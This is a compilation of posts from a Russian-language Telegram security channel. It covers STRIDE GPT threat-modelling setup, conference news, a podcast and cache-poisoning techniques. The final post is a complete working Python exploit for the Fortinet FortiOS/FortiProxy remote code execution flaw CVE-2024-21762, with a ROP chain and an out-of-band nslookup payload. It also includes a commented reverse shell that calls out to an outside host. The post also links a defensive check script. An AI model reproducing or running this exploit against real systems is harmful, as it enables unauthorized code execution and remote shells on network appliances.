Генерация модели угроз с помощью AI
#gpt #mistral #gemini #azure #threatmodeling
STRIDE GPT - это инструмент моделирования угроз на основе нейросетей, который использует большие языковые модели (LLM) для создания моделей угроз и деревьев атак для заданного приложения на основе методологии STRIDE. Пользователь дает нейросети данные о приложении, такие как тип приложения, методы аутентификации, а также информацию о том, работает ли приложение с Интернетом или обрабатывает конфиденциальные данные. Затем модель генерирует результаты на основе предоставленной информации.
➡️ Есть статья от VK "Руководство по моделированию угроз для разработчиков"
➡️ Доклад от разработка STRIDE GPT
🛠 Демо можете глянуть ТУТ
Веб-интерфейс поддерживает самые популярные LLM: OpenAI API, Google AI API, Microsoft Azure API, Mistral API. Также, вы можете загрузить диаграмму архитектуры вашего приложения( у вас ведь есть визуализация архитектуры приложения?))
Можно генерировать:
➡️ Модель угроз
➡️ Дерево потенциальных атак
➡️ Исправления, которые предлагает AI
➡️ Модель оценки рисков по DREAD
➡️ Пишет тест кейсы на Gherkin
Кому такая штука полезна?
➡️ Руководители ИБ
➡️ Разработчики
➡️ Архитекторы ИТ/ИБ
➡️ Аналитики ИБ
Установка:
Ручная установка
Установка современного человека
Запуск:
Ручной
Переходите по URL, который написан в консоли
Нормальный
Переходите на http://localhost:8501
Выполните шаги в интерфейсе Streamlit, чтобы использовать STRIDE GPT
p.s. скоро выйдет новый выпуск подкаста с нейросетевым гостем
🌚 @poxek | 📹 YouTube
#gpt #mistral #gemini #azure #threatmodeling
STRIDE GPT - это инструмент моделирования угроз на основе нейросетей, который использует большие языковые модели (LLM) для создания моделей угроз и деревьев атак для заданного приложения на основе методологии STRIDE. Пользователь дает нейросети данные о приложении, такие как тип приложения, методы аутентификации, а также информацию о том, работает ли приложение с Интернетом или обрабатывает конфиденциальные данные. Затем модель генерирует результаты на основе предоставленной информации.
Веб-интерфейс поддерживает самые популярные LLM: OpenAI API, Google AI API, Microsoft Azure API, Mistral API. Также, вы можете загрузить диаграмму архитектуры вашего приложения
Можно генерировать:
Кому такая штука полезна?
Установка:
Ручная установка
git clone https://github.com/mrwadams/stride-gpt.git; cd stride-gpt; python3 -m venv venv; source venv/bin/activate; pip install -r requirements.txt
Установка современного человека
docker pull mrwadams/stridegpt:latest
Запуск:
Ручной
streamlit run main.py
Переходите по URL, который написан в консоли
Нормальный
docker run -p 8501:8501 mrwadams/stridegpt
Переходите на http://localhost:8501
Выполните шаги в интерфейсе Streamlit, чтобы использовать STRIDE GPT
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Осталось всего несколько часов до закрытия Call Of Papers на Pentest Award.
Я уже подал :)
Жду ваших работ ;)
➡️ https://award.awillix.ru/
🌚 @poxek
Я уже подал :)
Жду ваших работ ;)
Please open Telegram to view this post
VIEW IN TELEGRAM
😁10 2
Forwarded from Just Security
This media is not supported in your browser
VIEW IN TELEGRAM
Друзья, в связи с тем, что за выходные нам поступило большое количество просьб о продлении срока приема заявок, мы решили отложить его до 14 июля. 🔛
Во многом это обусловлено долгим согласованием участников частичного раскрытия NDA. Тем, кому удалось вовремя отправить заявки, начислим дополнительный балл в попытке восстановить справедливость.
Сроки окончательные, и других переносов не будет, так как жюри нужно достаточно времени для прочтения всех работ.Намекаем, что наименьшая конкуренция сейчас в номинации «Ловись рыбка: за самый оригинальный фишинг или попытку засоциалить сотрудников», поэтому не стесняйтесь отправлять работы по этой теме, возможно именно вы победите.
Уже сейчас можно сказать, что качество работ выросло в сравнении с прошлым годом, а значит, мы еще больше приблизились к общей цели, с которой создавался Pentest award — развитие сообщества этичного хакинга.
Не терпится увидеть вас на награждении!
https://award.awillix.ru/
❤ @justsecurity
Во многом это обусловлено долгим согласованием участников частичного раскрытия NDA. Тем, кому удалось вовремя отправить заявки, начислим дополнительный балл в попытке восстановить справедливость.
Сроки окончательные, и других переносов не будет, так как жюри нужно достаточно времени для прочтения всех работ.
Уже сейчас можно сказать, что качество работ выросло в сравнении с прошлым годом, а значит, мы еще больше приблизились к общей цели, с которой создавался Pentest award — развитие сообщества этичного хакинга.
Не терпится увидеть вас на награждении!
https://award.awillix.ru/
Please open Telegram to view this post
VIEW IN TELEGRAM
ChatGPT 10 - будущий Скайнет ?! Артем Семенов - PWN AI
#подкаст #pwnai
❗️ Буду краток, вышел второй выпуск 🌚 Poxek Podcast 🕺
У него в гостях - Артем Семёнов, основатель PWN AI. PWN AI (пывнэйай) - это телеграм канал, в котором Вы познаете (нет нет - не буддизм), как можно применить ИИ в нашей нелёгкой работе безопасника, а также много почитать об угрозах и проблемах безопасности этого самого ИИ.
➡️ Подкаст будет интересен
Специалистам по кибербезопасности
Владельцам бизнеса
Всем, кто хочет узнать больше о применении нейросетей, LLM и машинного обучения в работе и для собственных нужд
➡️ В этом подкасте мы обсудили
Кибербезопасность: актуальные угрозы ИИ, ИИ в ИБ, ИБ в ИИ.
Red Team: как взламывают нейросети, LLM
Red Team: как нейросети и LLM взламывают сайты и IT инфраструктуру.
PWN AI: представление канала, чем славится и почему стоит подписаться :)
Исследования: Разработчики нейросетей понимают, как работает их же продукт?!
➡️ Ссылки
📹 YouTube
😻 Mave
🎵 Яндекс Подкаст
❤️ PWN AI
Обязательно смотрите до конца!
🌚 @poxek
#подкаст #pwnai
У него в гостях - Артем Семёнов, основатель PWN AI. PWN AI (пывнэйай) - это телеграм канал, в котором Вы познаете (нет нет - не буддизм), как можно применить ИИ в нашей нелёгкой работе безопасника, а также много почитать об угрозах и проблемах безопасности этого самого ИИ.
Специалистам по кибербезопасности
Владельцам бизнеса
Всем, кто хочет узнать больше о применении нейросетей, LLM и машинного обучения в работе и для собственных нужд
Кибербезопасность: актуальные угрозы ИИ, ИИ в ИБ, ИБ в ИИ.
Red Team: как взламывают нейросети, LLM
Red Team: как нейросети и LLM взламывают сайты и IT инфраструктуру.
PWN AI: представление канала, чем славится и почему стоит подписаться :)
Исследования: Разработчики нейросетей понимают, как работает их же продукт?!
Обязательно смотрите до конца!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18 3😁2👾2⚡1
Forwarded from OFFZONE
This media is not supported in your browser
VIEW IN TELEGRAM
Пятый OFFZONE пройдет 22–23 августа в Москве, в Культурном центре ЗИЛ.
В этом году у нас еще больше зон для выступлений: добавились AI.Zone и Threat.Zone.
Ждем доклады на самые разные темы: open-source, применение AI/ML в кибербезопасности, уязвимости в парсерах, пентест Wi-Fi и не только. Не бойтесь предложить что-то свое :)
Спикеры, которые пройдут отбор, получат: бесплатные проходки на конфу и Speaker party, наш мерч, а также другие плюшки в зависимости от зоны.
Присылайте заявки на доклады до 12 июля.
Узнать больше и подать заявку
Please open Telegram to view this post
VIEW IN TELEGRAM
Отравление кеша. Разбираемся с кешированием страниц и атаками на него
#webpentest
Отравление кеша (cache poisoning) — это вид атаки, при котором атакующий вносит в кеш системы некорректные данные. Когда система пытается их использовать, это приводит к проблемам: от нарушения работы до компрометации данных. В этой статье я покажу отравление кеша на примере реальной уязвимости в движке сайта, а также разберемся c HTTP-заголовками, которые препятствуют этой атаке.
🔓 Читать далее
🌚 @poxek
#webpentest
Отравление кеша (cache poisoning) — это вид атаки, при котором атакующий вносит в кеш системы некорректные данные. Когда система пытается их использовать, это приводит к проблемам: от нарушения работы до компрометации данных. В этой статье я покажу отравление кеша на примере реальной уязвимости в движке сайта, а также разберемся c HTTP-заголовками, которые препятствуют этой атаке.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from SHADOW:Group
x-middleware-prefetch приводит к получению пустого объекта JSON {} в качестве ответа. При наличии CDN или системы кэширования этот пустой ответ потенциально может быть кэширован, в зависимости от конфигурации правил кэширования, что делает целевую страницу непрактичной, а ее содержимое недоступным и получается некая разновидность DOS'а через отравление кэша.Rsc: 1, может привести к отравлению кэша и вернет RSC React вместо исходного содержимого. Успешность также зависит от CDN и его правил кэширования.x-invoke-status, непосредственно указанного в запросе и вызвать/вернуть страницу ошибки. Как правило, CDN и системы кэширования настроены так, чтобы не кэшировать коды ошибок HTTP. Однако можно указать код 200 для согласования с правилами кэширования и эффективно “принудительно” кэшировать страницу с ошибкой.Более подробно про каждый из способов, а также некоторые советы
#web #cache #dos
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Конкурс проходок на 🕐 🕑 🕒 🕓 🕔 🕕 🕖
#offzone2024 #конкурс
➡️ Конкурс на 2 проходки на OFFZONE
➡️ Условия: сделать самый оригинальный, смешной, не токсичный мем про OFFZONE
➡️ Сроки: 2 недели с момента выхода поста
➡️ Условия оценки: наибольшее кол-во положительных реакций на сообщении и если будет сложная борьба, то моё мнение и @fun9ral.
➡️ Условия участия: 1 мем = 1 сообщение с тегом #offzone2024
Условие обязательное, не будете следить, не будете участвовать.
Также у OFFZONE есть свой канал. Там и новости выходят о мероприятии, а также каждый год ребята крафтят крутые хардварные бейджы)
🌚 @poxek
#offzone2024 #конкурс
Условие обязательное, не будете следить, не будете участвовать.
Также у OFFZONE есть свой канал. Там и новости выходят о мероприятии, а также каждый год ребята крафтят крутые хардварные бейджы)
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13😁5 4👾1
Похек
Конкурс проходок на 🕐 🕑 🕒 🕓 🕔 🕕 🕖 #offzone2024 #конкурс ➡️ Конкурс на 2 проходки на OFFZONE ➡️ Условия: сделать самый оригинальный, смешной, не токсичный мем про OFFZONE ➡️ Сроки: 2 недели с момента выхода поста ➡️ Условия оценки: наибольшее кол-во положительных реакций…
Обновил пост. Дописал сроки - 2 недели.
🌚3
Forwarded from Mobile AppSec World (Yury Shabalin)
Как построить процесс безопасной разработки и не сойти с ума
Всем привет!
Буквально через 10 минут пообщаемся с очень уважаемыми и умными людьми на тему процессов безопасной разработки!
Уверен, будет интересно)
Если интересно, подключайтесь!
Всем привет!
Буквально через 10 минут пообщаемся с очень уважаемыми и умными людьми на тему процессов безопасной разработки!
Уверен, будет интересно)
Если интересно, подключайтесь!
Код ИБ
Внедрение DevSecOps: какие препятствия могут возникнуть и как их преод
На эфире мы расскажем, на что стоит обратить внимание при внедрении DevSecOps, а также приведем примеры кейсов.
Forwarded from Mobile AppSec World (Yury Shabalin)
Персональные данные и мобильные приложения, как они связаны?
Всем привет!
Я наконец выплыл из отпуска и возвращаюсь в рабочее русло 😄
И на повестке дня сегодня не что иное, как персональные данные и их утечки.
Меня очень давно интересовал этот вопрос, можно ли считать хранение или утечку ПДн через мобилку на самом деле утечкой, чем это может грозить и вообще, что же такое мобильное приложение с точки зрения нашего законодательства?
Я потратил достаточно много времени и экспертизой своих коллег чтобы разобраться в этом вопросе и вот результат - статья на Хабр.
Как мне кажется получилось достаточно неплохо, по крайней мере для себя я определился и с понятиями ПДн в мобилках и с определением приложений вообще в законах. Надеюсь, вам тоже это будет интересно. Особенно, учитывая, что сейчас на рассмотрении закон о введении оборотных штрафов для компаний, допустивших утечки.
Приятного чтения!
#habr #ПДн
Всем привет!
Я наконец выплыл из отпуска и возвращаюсь в рабочее русло 😄
И на повестке дня сегодня не что иное, как персональные данные и их утечки.
Меня очень давно интересовал этот вопрос, можно ли считать хранение или утечку ПДн через мобилку на самом деле утечкой, чем это может грозить и вообще, что же такое мобильное приложение с точки зрения нашего законодательства?
Я потратил достаточно много времени и экспертизой своих коллег чтобы разобраться в этом вопросе и вот результат - статья на Хабр.
Как мне кажется получилось достаточно неплохо, по крайней мере для себя я определился и с понятиями ПДн в мобилках и с определением приложений вообще в законах. Надеюсь, вам тоже это будет интересно. Особенно, учитывая, что сейчас на рассмотрении закон о введении оборотных штрафов для компаний, допустивших утечки.
Приятного чтения!
#habr #ПДн
Хабр
Защита персональных данных в мобильных приложениях: как не нарушить закон
Всем привет! На связи снова Юрий Шабалин, генеральный директор «Стингрей Технолоджиз». В предыдущей статье я рассказывал о влиянии Профиля защиты ЦБ РФ на мобильные приложения. В продолжение темы...
🔥4👾3
Fortinet FortiOS & FortiProxy Unauthorized RCE CVE-2024-21762
#RCE #CVE #Fortinet #FortiOS #FortiProxy
CVE-2024-21762 представляет собой уязвимость записи за границы буфера (buffer overflow) в Fortinet FortiOS и FortiProxy. Эта уязвимость позволяет неавторизованному атакующему выполнять произвольный код с помощью специально сформированных HTTP-запросов.
➡️ Атакуемые продукты:
- FortiOS
- FortiProxy
Эксплойт:
Подробные ресерчи можете найти ТУТ, ТУТ, ТУТ
Скрипт для проверки безопасности вашего сервера
https://github.com/BishopFox/cve-2024-21762-check
🌚 @poxek
#RCE #CVE #Fortinet #FortiOS #FortiProxy
CVE-2024-21762 представляет собой уязвимость записи за границы буфера (buffer overflow) в Fortinet FortiOS и FortiProxy. Эта уязвимость позволяет неавторизованному атакующему выполнять произвольный код с помощью специально сформированных HTTP-запросов.
- FortiOS
- FortiProxy
Эксплойт:
import socket
import time
import argparse
TARGET = 'xxxxxxxxxxxx' # Target IP
PORT = 443 # Target port, usually 443 for SSL VPN
def make_sock(target, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, port))
return sock
def send_payload(payload, target, port):
with make_sock(target, port) as ssock:
ssock.sendall(payload)
def main():
ssl_do_handshake_ptr = b"%60%ce%42%00%00%00%00%00"
getcwd_ptr = b"%70%62%2c%04%00%00%00%00"
pivot_1 = b"%52%f7%fd%00%00%00%00%00" # push rdi; pop rsp; ret;
pivot_2 = b"%ac%c9%ab%02%00%00%00%00" # add rsp, 0x2a0; pop rbx; pop r12; pop rbp; ret;
rop = b""
rop += b"%c6%e2%46%00%00%00%00%00" # push rdi; pop rax; ret;
rop += b"%19%6f%4d%01%00%00%00%00" # sub rax, 0x2c8; ret;
rop += b"%8e%b2%fe%01%00%00%00%00" # add rax, 0x10; ret;
rop += b"%63%db%ae%02%00%00%00%00" # pop rcx; ret;
rop += b"%00%00%00%00%00%00%00%00" # zero rcx
rop += b"%38%ad%98%02%00%00%00%00" # or rcx, rax; setne al; movzx eax, al; ret;
rop += b"%c6%52%86%02%00%00%00%00" # shl rax, 4; add rax, rdx; ret;
rop += b"%6e%d0%3f%01%00%00%00%00" # or rdx, rcx; ret; - rdx is zero so this is a copy
rop += b"%a4%df%98%02%00%00%00%00" # sub rdx, rax; mov rax, rdx; ret;
rop += b"%f5%2c%e6%00%00%00%00%00" # sub rax, 0x10; ret;
rop += b"%e4%e6%d7%01%00%00%00%00" # add rsi, rax; mov [rdi+8], rsi; ret;
rop += b"%10%1b%0a%01%00%00%00%00" # push rax; pop rdi; add eax, 0x5d5c415b; ret;
rop += b"%25%0f%8d%02%00%00%00%00" # pop r8; ret; 0x028d0f25
rop += b"%00%00%00%00%00%00%00%00" # r8
pivot_3 = b"%e0%3f%4d%02%00%00%00%00" # add rsp, 0xd90; pop rbx; pop r12; pop rbp; ret;
call_execl = b"%80%c1%43%00%00%00%00%00"
bin_node = b"/bin/node%00"
e_flag = b"-e%00"
## use this one for rev shell b'(function(){var net%3drequire("net"),cp%3drequire("child_process"),sh%3dcp.spawn("/bin/node",["-i"]);var client%3dnew net.Socket();client.connect(1337,"xxxxxxxxxxx",function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;})();%00'
js_payload = b'(function(){var cp=require("child_process");cp.execSync("nslookup xxxxxxxxxxx.oastify.com");})();%00'
form_value = b""
form_value += b"B"*11 + bin_node + b"B"*6 + e_flag + b"B"*14 + js_payload
form_value += b"B"*438 + pivot_2 + getcwd_ptr
form_value += b"B"*32 + pivot_1
form_value += b"B"*168 + call_execl
form_value += b"B"*432 + ssl_do_handshake_ptr
form_value += b"B"*32 + rop + pivot_3
body = (b"B"*1808 + b"=" + form_value + b"&")*20
data = b"POST /remote/hostcheck_validate HTTP/1.1\r\n"
data += b"Host: " + TARGET.encode() + b"\r\n"
data += b"Content-Length: " + str(len(body)).encode() + b"\r\n"
data += b"\r\n"
data += body
send_payload(data, TARGET, PORT)
# Short delay to ensure the server processes the first request
time.sleep(2)
# Preparing and sending the second part of the exploit
data = b"POST / HTTP/1.1\r\n"
data += b"Host: " + TARGET.encode() + b"\r\n"
data += b"Transfer-Encoding: chunked\r\n"
data += b"\r\n"
data += b"0"*4137 + b"\0"
data += b"A"*1 + b"\r\n\r\n"
send_payload(data, TARGET, PORT)
if __name__ == "__main__":
main()
Подробные ресерчи можете найти ТУТ, ТУТ, ТУТ
Скрипт для проверки безопасности вашего сервера
https://github.com/BishopFox/cve-2024-21762-check
git clone https://github.com/BishopFox/cve-2024-21762-check; cd cve-2024-21762-check; python3 check-cve-2024-21762.py <host> <port>
Please open Telegram to view this post
VIEW IN TELEGRAM